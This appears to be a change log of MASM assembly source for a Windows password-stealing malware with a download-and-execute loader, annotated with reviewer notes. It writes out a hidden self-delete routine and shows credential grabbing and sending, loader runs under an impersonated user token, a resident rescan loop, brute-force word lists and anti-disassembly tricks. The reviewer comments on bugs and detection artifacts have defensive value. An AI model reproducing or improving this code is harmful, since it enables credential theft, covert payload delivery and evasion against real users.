- Line 35 (code addition):
- includelib DLL_Loader.lib
- Line 57 (code edition):
- push ebp -> xor edx, eax
- mov ebp, esp -> xor eax, edx
- pop ebp -> xor edx, eax
- Line 63 (code addition):
- nop
- Line 65 (code addition):
- nop
- Line 67 (code addition):
- nop
- Line 70 (code edition):
- db 0ffh -> db 0feh
- Line 75 (code deletion):
- Removed the IFDEF USE_UPX
- Line 80 (code addition):
- IFNDEF DISABLE_GRABBER
- Line 84 (code addition):
- include Loader.asm
- Line 110 (code addition):
- nop
- Line 118 (code addition):
- nop
- Line 119 (code edition):
- push 19131011 -> push 19131012
- Line 129 (code addition):
- nop
- Line 135 (code addition):
- nop
- Line 164 (code addition):
- IFNDEF DISABLE_GRABBER
- Line 451 (code addition):
- ENDIF
- Line 451 (code edition):
- IFDEF ENABLE_LOADER -> IFDEF SELF_DELETE
- Line 456 (code addition/deletion):
- Deleted szNumToStrExeFmt/szMD5HashStr/szLoaderValueDupeCheck
- Added:
- szBatchFmt db '%d.bat',0
- szSelfDelQuoteFmt db ' "%s" ',0
- szShellExecute db 'ShellExecuteA',0
- szBatchFile db 13,10,9,9,13,10,13,10,09," :ktk ",13,10,13,10,13,10," del ",9," %1 ",13,10,9,"if ",9,9," exist ",9," %1 ",9," goto ",9,13," ktk",13,10," del ",9," %0 ",0
- szShell32Lib db 'shell32.dll',0
- szComSpec db 'COMSPEC', 0
- szSelfCommand db '%s /c del "%s" > NUL',0
- Line 466 (code deletion/edition):
- RunLoader procedure removed/replaced by:
- ; Self delete using comspec
- SelfDeleteComSpec proc uses ebx
- LOCAL lpSelfFileName: DWORD
- LOCAL lpComSpec: DWORD
- LOCAL lpCommandBuffer: DWORD
- LOCAL _si: STARTUPINFO
- LOCAL _pi: PROCESS_INFORMATION
- Line 474 (code deletion/edition):
- AntiDisasmTrick replaced by:
- invoke MemAlloc, MAX_PATH+1
- mov lpSelfFileName, eax
- Line 477 (code deletion/edition):
- mov edi, offset szLoaderList replaced by:
- invoke MemAlloc, MAX_PATH+1
- mov lpComSpec, eax
- Line 480 (code deletion/edition):
- IFDEF LOADER_EXECUTE_NEW_FILES_ONLY replaced by:
- invoke MemAlloc, MAX_PATH+1
- mov lpCommandBuffer, eax
- Line 466 (huge code addition/deletion) - complete listing of the new SelfDeleteComSpec procedure that replaces RunLoader (the partial snippets listed above are shown here in full):
- ; Self delete using comspec
- ; SelfDeleteComSpec: builds the command line '%COMSPEC% /c del "<own 8.3 path>" > NUL'
- ; and launches it as a hidden (SW_HIDE), initially suspended cmd.exe. The child is
- ; dropped to IDLE_PRIORITY_CLASS and this process raised to HIGH_PRIORITY_CLASS before
- ; the child is resumed, so the 'del' is expected to run only after this process exits.
- ; Returns eax = ebx (incremented once if CreateProcess succeeded); the caller tests
- ; eax as a success flag (see the 'invoke SelfDeleteComSpec / .IF eax' site below).
- ; NOTE(review): 'uses ebx' only saves/restores ebx; it is never zeroed in this proc,
- ; so on the failure paths eax carries whatever ebx the caller had. An 'xor ebx, ebx'
- ; right after the LOCALs looks intended - confirm against the caller's expectations.
- SelfDeleteComSpec proc uses ebx
- LOCAL lpSelfFileName: DWORD ; heap buffer: own module path, converted to short (8.3) form
- LOCAL lpComSpec: DWORD ; heap buffer: value of the COMSPEC environment variable
- LOCAL lpCommandBuffer: DWORD ; heap buffer: formatted cmd.exe command line
- LOCAL _si: STARTUPINFO
- LOCAL _pi: PROCESS_INFORMATION
- ; NOTE(review): none of the three MemAlloc results is checked for NULL before use.
- invoke MemAlloc, MAX_PATH+1
- mov lpSelfFileName, eax
- invoke MemAlloc, MAX_PATH+1
- mov lpComSpec, eax
- invoke MemAlloc, MAX_PATH+1
- mov lpCommandBuffer, eax
- ; Own image path; GetShortPathName is documented as allowing in-place conversion
- ; (same buffer for input and output). Neither return value is checked here.
- invoke GetModuleFileName, NULL, lpSelfFileName, MAX_PATH
- invoke GetShortPathName, lpSelfFileName, lpSelfFileName, MAX_PATH
- invoke ZeroMemory, addr _si, sizeof _si
- invoke ZeroMemory, addr _pi, sizeof _pi
- mov _si.cb, sizeof _si
- mov _si.dwFlags, STARTF_USESHOWWINDOW
- mov _si.wShowWindow, SW_HIDE ; child console window is never shown
- invoke GetEnvironmentVariable, addr szComSpec, lpComSpec, MAX_PATH
- .IF eax
- ; NOTE(review): lpCommandBuffer is only MAX_PATH+1 bytes, but the format joins two
- ; strings that may each be up to MAX_PATH characters plus ~15 literal characters;
- ; wsprintf takes no size argument, so a long COMSPEC or module path overruns the heap
- ; buffer. The format string itself is szSelfCommand ('%s /c del "%s" > NUL').
- invoke wsprintf, lpCommandBuffer, addr szSelfCommand, lpComSpec, lpSelfFileName
- ; Created suspended so the priority changes below take effect before 'del' runs.
- invoke CreateProcess, NULL, lpCommandBuffer, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, addr _si, addr _pi
- .IF eax
- invoke GetCurrentProcess
- invoke SetPriorityClass, eax, HIGH_PRIORITY_CLASS
- ; Clear read-only/hidden/system bits on the own image so 'del' is not refused.
- invoke SetFileAttributes, lpSelfFileName, FILE_ATTRIBUTE_NORMAL
- invoke SetPriorityClass, _pi.hProcess, IDLE_PRIORITY_CLASS
- invoke ResumeThread, _pi.hThread
- ; NOTE(review): 'del' is attempted exactly once. If this process is still running when
- ; cmd.exe gets scheduled, the delete would fail (image in use); the removed batch-file
- ; variant (szBatchFile ':ktk' loop) retried until the file was gone. The priority
- ; juggling is a race-avoidance heuristic, not a guarantee.
- ; NOTE(review): _pi.hProcess / _pi.hThread are never passed to CloseHandle.
- ; Detection note: a hidden cmd.exe child whose command line is 'cmd /c del "<exe>" > NUL',
- ; preceded by SetFileAttributes(FILE_ATTRIBUTE_NORMAL) on the caller's own image, are
- ; the observable artifacts of this routine.
- inc ebx
- .ENDIF
- .ENDIF
- invoke MemFree, lpSelfFileName
- invoke MemFree, lpComSpec
- invoke MemFree, lpCommandBuffer
- mov eax, ebx
- ret
- SelfDeleteComSpec endp
- Line 526 (code addition):
- invoke SelfDeleteComSpec
- .IF eax
- ret
- .ENDIF
- Line 740 (code addition):
- IFNDEF DISABLE_GRABBER
- Line 872 (code addition):
- ENDIF
- Line 874 (code edition):
- InitApp proc -> InitApp proc lpUserToken
- Line 887 (code edition):
- invoke ImpersonateLocalSystemUser -> invoke ImpersonateLocalSystemUser, lpUserToken
- Line 893 (comment addition):
- ; Get impersonated username to ignore it in brute-force procedure
- Line 905 (code edition/deletion):
- IFNDEF DISABLE_GRABBER
- IFDEF ENCRYPT_REPORT
- invoke DecodeReportPassword, offset CReportPassword
- ENDIF
- Line 911 (code addition):
- invoke Randomize
- Line 921 (code edition):
- mov eax, EXCEPTION_CONTINUE_SEARCH -> mov eax, EXCEPTION_CONTINUE_SEARCH (both sides read identically here; the actual edit at this line was not captured in these notes)
- Line 926 (code addition):
- LOCAL lpUserToken: DWORD
- LOCAL isFirstCycleRun: DWORD
- Line 936 (code addition/deletion):
- invoke InitApp replaced by:
- mov lpUserToken, NULL ; impersonated user token
- invoke InitApp, addr lpUserToken
- IFDEF ENABLE_RESIDENT_MODE
- invoke CopyRunFromAutoDirectory
- ENDIF
- Line 945 (Code addition):
- invoke DecipherList, offset CWordList
- Line 948 (deletion/edition):
- invoke ScanAndSend replaced by:
- IFNDEF DISABLE_GRABBER
- invoke ScanAndSend
- ELSE
- invoke MyDownloadInit
- ENDIF
- Line 954 (comment edition):
- ; Run loader (it will attempt to download and execute files with the privileges of the currently logged-on account
- ; when run from a Windows Service [LocalSystem user], which has limited (tricked) access to the HKCU path and %APPDATA%)
- Line 957 (code edition):
- invoke RunLoader -> invoke RunLoader, lpUserToken
- Line 960 (Procedure addition):
- ENDIF
- ; Resident looped cycle
- mov isFirstCycleRun, TRUE ; do not send passwords for the first cycle
- IFDEF ENABLE_RESIDENT_MODE
- .WHILE TRUE
- IFDEF PERIODIC_PASSWORD_SCAN
- IFNDEF DISABLE_GRABBER
- invoke NeedsPasswordGrabbing
- .IF eax && !isFirstCycleRun
- ; Scan and send passwords
- invoke ScanAndSend
- .ENDIF
- ENDIF
- ENDIF
- invoke Sleep, RESIDENT_LOADER_TIMEOUT*60*1000
- IFDEF ENABLE_LOADER
- invoke RunLoader, lpUserToken
- ENDIF
- mov isFirstCycleRun, FALSE
- .ENDW
- Line 993 (code edition):
- IFNDEF DISABLE_GRABBER
- Line 996 (code edition):
- ENDIF
- Line 998 (comment addition):
- ; Self-delete the executable (also works in DLL mode - in that case the parent executable is the one that gets deleted)
- Line 1023 (code deletion):
- After AntiDisasmTrick this part disappeared:
- .WHILE TRUE
- invoke GetTickCount
- mov ecx, 10
- xor edx, edx
- div ecx
- .IF edx == 5
- .BREAK
- .ENDIF
- .ENDW